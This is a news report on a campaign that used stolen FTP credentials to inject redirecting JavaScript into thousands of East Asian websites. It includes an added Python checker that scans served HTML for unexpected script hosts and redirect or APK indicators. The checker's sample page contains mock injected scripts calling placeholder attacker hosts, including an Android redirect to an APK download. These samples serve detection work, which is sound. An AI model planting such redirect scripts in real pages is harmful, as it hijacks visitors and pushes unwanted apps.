Since the beginning of September 2022, thousands of websites aimed at East Asian audiences have been compromised in a large-scale malicious campaign that redirects visitors to adult-themed content. The ongoing attack involves logging in to the target web server with valid FTP credentials, which the threat actor had obtained beforehand by means that have not been disclosed, and then injecting malicious JavaScript code into the compromised websites' pages.
“In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking,” Wiz said in a recently published report.
The cloud security company stated that identifying a common attack vector has been challenging, since the compromised websites, owned by both small businesses and large corporations, run on a variety of tech stacks and are hosted with different service providers. The one trait most of them share is that they are either hosted in China or hosted in another country but optimized for Chinese users.
Additionally, the URLs hosting the malicious JavaScript code are geofenced, so the script does not execute for visitors in certain East Asian countries. There are further hints that the campaign targets Android users: the redirection script sends visitors to gambling websites that urge them to download an app (APK package name “com.tyc9n1999co.coandroid”).
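The report does not reproduce the injected script, so the following is an added example, not code from Wiz or from the campaign: a baseline check a site owner can run over their own served HTML to surface the two symptoms described above, a third-party `<script src>` pointing at a host the owner does not recognise, and an inline script that performs a client-side redirect or pushes an APK. The sample page, the allowlisted host and the attacker hostnames are all constructed placeholders, not indicators from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not a real compromised site): a legitimate
# first-party script, one allowlisted CDN, one unexpected external script,
# and one inline redirect that pushes an APK at Android visitors.
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-legit.com/lib.js"></script>
<script src="https://js.attacker-example.test/r.js"></script>
</head><body>
<script>
if (navigator.userAgent.indexOf("Android") !== -1) {
  window.location.href = "https://bet.attacker-example.test/app.apk";
}
</script>
<script>console.log("analytics");</script>
</body></html>
"""

# Hosts the site owner knowingly loads scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"cdn.example-legit.com"}

# Inline-JS patterns that indicate a client-side redirect or an APK download.
REDIRECT_PATTERNS = [
    r"window\.location(\.href)?\s*=",
    r"location\.replace\s*\(",
    r"document\.location\s*=",
    r"\.apk\b",
]


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # text bodies of <script>...</script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> contents over as raw CDATA.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def find_suspicious_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (unexpected external script hosts, inline scripts with redirect/APK indicators)."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()

    unexpected = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:        # relative path: served by this site itself
            continue
        if host not in allowed_hosts:
            unexpected.append(host)

    suspicious = []
    for body in parser.inline:
        if any(re.search(pattern, body) for pattern in REDIRECT_PATTERNS):
            suspicious.append(body.strip())
    return unexpected, suspicious


if __name__ == "__main__":
    hosts, snippets = find_suspicious_scripts(SAMPLE_HTML)
    print("unexpected external script hosts:", hosts)
    print("inline scripts with redirect/APK indicators:", len(snippets))
```

Because the malicious script is geofenced, fetching the page from a blocked region will not show the redirect; run the check against the HTML as stored on the server (or fetched from a vantage point the attacker is targeting) rather than from the office network. A mismatch between the served page and the deployed source tree is the signal to look for.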
Although the threat actor's identity is unknown and their exact objectives have not been established, they are believed to be engaged in ad fraud and SEO manipulation or, alternatively, in driving inorganic traffic to these gambling websites. Also noteworthy is what the attacks do not involve: no phishing, no web skimming, and no malware infection of visitors.
Researchers Amitai Cohen and Barak Sharoni said they still do not know how the threat actor has been gaining initial access to so many websites. They have not yet found any notable similarity among the compromised servers beyond the fact that they all use FTP. Given the attack's apparent lack of sophistication, they consider it unlikely that the threat actor is exploiting a zero-day vulnerability, but they cannot completely rule it out.